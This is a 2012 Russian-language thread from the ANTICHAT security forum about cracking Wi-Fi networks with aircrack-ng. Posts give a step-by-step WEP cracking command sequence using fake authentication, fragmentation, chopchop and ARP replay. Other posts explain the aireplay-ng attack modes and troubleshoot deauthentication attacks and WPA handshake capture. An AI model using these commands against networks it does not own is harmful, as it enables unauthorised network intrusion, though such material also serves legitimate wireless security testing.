ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

23.04.2012, 01:30
|
|
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме: 37847
Репутация:
20
|
|
Сообщение от tester_new
но хочеца что бы сразу видеть все сети и всех клиентов на них!!
Можно например,уменьшить фонт на 6 ... будет влезать больше...
Моно не лупиццо постояно на экран, а запускать с ключем -w xxx и писать в файл . В файле xxx.kismet.netxml потом можно посмотреть все AP и клиентов.
Сообщение от tester_new
Вопрос 2. если к AP не подключен никто... значит шансов 0???
Если ломается WEP, то можно ...
Сообщение от tester_new
ВТакже буду благодарен за ссылку на модель МОЩНОГО usb адаптера
который без проблем работает с aircrack-ng
Думаю, что многие со мной согласятся, что один из лучших вариантов Alfa AWUS036H
|
|
|

23.04.2012, 21:44
|
|
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
Провел на форуме: 108975
Репутация:
24
|
|
Сообщение от zuriuslev
Можно например,уменьшить фонт на 6 ... будет влезать больше...
Моно не лупиццо постояно на экран, а запускать с ключем -w xxx и писать в файл . В файле xxx.kismet.netxml потом можно посмотреть все AP и клиентов.
Если ломается WEP, то можно ...
Думаю, что многие со мной согласятся, что один из лучших вариантов Alfa AWUS036H
Спасибо!! насчет уменьшить шрифт как то не подумал...
А насчет карточки... в ubuntu 11.10 к примеру она автоматом обнаруживается без проблем? не будет необходимости ставить madwifi или что то в этом роде....
|
|
|

24.04.2012, 01:12
|
|
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме: 37847
Репутация:
20
|
|
Сообщение от tester_new
А насчет карточки... в ubuntu 11.10 к примеру она автоматом обнаруживается без проблем? не будет необходимости ставить madwifi или что то в этом роде....
Драйвер rtl8187, думаю, что должен быть везде ...
Поищите у себя в модулях - find /lib/modules -name "rtl8187*" -ls
|
|
|

29.04.2012, 12:58
|
|
Познающий
Регистрация: 26.09.2010
Сообщений: 52
Провел на форуме: 14166
Репутация:
10
|
|
Ребят может не сюда но все же: киньте кто в личку ссылку или сдесь может на правильное использование FakeAР и airodrop для взлома ВПА2 словарики не катят устал уже смотреть неделями на бегающие циферки. Сам искал искал но с телефона не очень круто. Спасибо!
|
|
|

12.05.2012, 00:14
|
|
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
Провел на форуме: 108975
Репутация:
24
|
|
Сообщение от zuriuslev
Драйвер rtl8187, думаю, что должен быть везде ...
Поищите у себя в модулях - find /lib/modules -name "rtl8187*" -ls
можешь написать пример использования aireplay-ng к точке доступа с WEP шифрованием.. с WPA/WPA2 шансов ноль вообще, вообще?) если на ней нет абонентов?
|
|
|

12.05.2012, 01:05
|
|
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме: 37847
Репутация:
20
|
|
Сообщение от tester_new
можешь написать пример использования aireplay-ng к точке доступа с WEP шифрованием.. с WPA/WPA2 шансов ноль вообще, вообще?) если на ней нет абонентов?
WEP разжевано здесь - http://forum.antichat.ru/thread153326.html
WPA есть шансы с - http://forum.antichat.ru/thread310835.html
|
|
|

15.05.2012, 10:04
|
|
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
Провел на форуме: 108975
Репутация:
24
|
|
Сообщение от zuriuslev
WEP разжевано здесь - http://forum.antichat.ru/thread153326.html
WPA есть шансы с - http://forum.antichat.ru/thread310835.html
Честно не совсем понятно написано, что конкретно и зачем каждая из команд делает? т.е просто выполнить все по очереди не зная толком что и как зачем делаетcя ?
Код:
Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0
6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y
Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
|
|
|

15.05.2012, 13:26
|
|
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме: 37847
Репутация:
20
|
|
Сообщение от tester_new
Честно не совсем понятно написано, что конкретно и зачем каждая из команд делает? т.е просто выполнить все по очереди не зная толком что и как зачем делаетcя ?
Только задавая вопросы и не пытаясь учиться - это тупиковый путь.
Вся оригинальная документация по aircrack-ng, есть на сайте разработчиков - http://www.aircrack-ng.org/doku.php
Если коротенько, то в примере -
aireplay-ng -1 - проверка Fake authentication
aireplay-ng -1 6000 - Fake authentication и посылка keepalive пакетов для поддержаник коннекции
aireplay-ng -5 - Fragmentation attack
aireplay-ng -4 - KoreK chopchop attack
packetforge-ng - генерация ARP пакета
aireplay-ng -2 - отпавка ARP пакетов
Attack 0: Deauthentication
Attack 1: Fake authentication
Attack 2: Interactive packet replay
Attack 3: ARP request replay attack
Attack 4: KoreK chopchop attack
Attack 5: Fragmentation attack
Attack 6: Cafe-latte attack
Attack 7: Client-oriented fragmentation attack
Attack 9: Injection test
Всё это надо, что-бы заставить AP отправлять data пакеты.
Если AP имеет активных клиентов, и генерирует много data пакетов. Без всего этого можно обойтись, просто собирать эти самые data пакеты.
Чем больше, тем лучше .... А потом уже ломать aircrack-ng.
|
|
|

23.06.2012, 00:42
|
|
New Member
Регистрация: 13.02.2012
Сообщений: 59
Провел на форуме: 21939
Репутация:
0
|
|
салют!
нужна помощь скорее всего с командой aireplay-ng -0 0 -a BSSID роутера -c BSSID клиента mon0... раньше я мог проводить deauth роутера и клиента,но сейчас это вообще никак не идет.airodump-ng mon0 не показывает что handshake пойман.
пробовал besside-ng mon0, там постоянно crappy connection показывает,хотя,опять же, раньше все работало и handshake был у меня...не знаю что делать.возможно ли что что-то с wi-fi адаптером?
p.s. это все на BT5R2 делаю.
|
|
|

23.06.2012, 02:03
|
|
Active Member
Регистрация: 10.04.2012
Сообщений: 632
Провел на форуме: 238147
Репутация:
170
|
|
Сообщение от emincheg
салют!
нужна помощь скорее всего с командой aireplay-ng -0 0 -a BSSID роутера -c BSSID клиента mon0... раньше я мог проводить deauth роутера и клиента,но сейчас это вообще никак не идет.airodump-ng mon0 не показывает что handshake пойман.
пробовал besside-ng mon0, там постоянно crappy connection показывает,хотя,опять же, раньше все работало и handshake был у меня...не знаю что делать.возможно ли что что-то с wi-fi адаптером?
p.s. это все на BT5R2 делаю.
Для начала попробуй провести тест системы командой
Код:
aireplay-ng -9 wlan0
,
предварительно запустив airodump-ng на канале, на котором работает выбранная точка. Так можно хотя бы приблизительно прикинуть, в чём проблема - в беспроводной карточке или точке доступа. Вывод команды в студию =)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|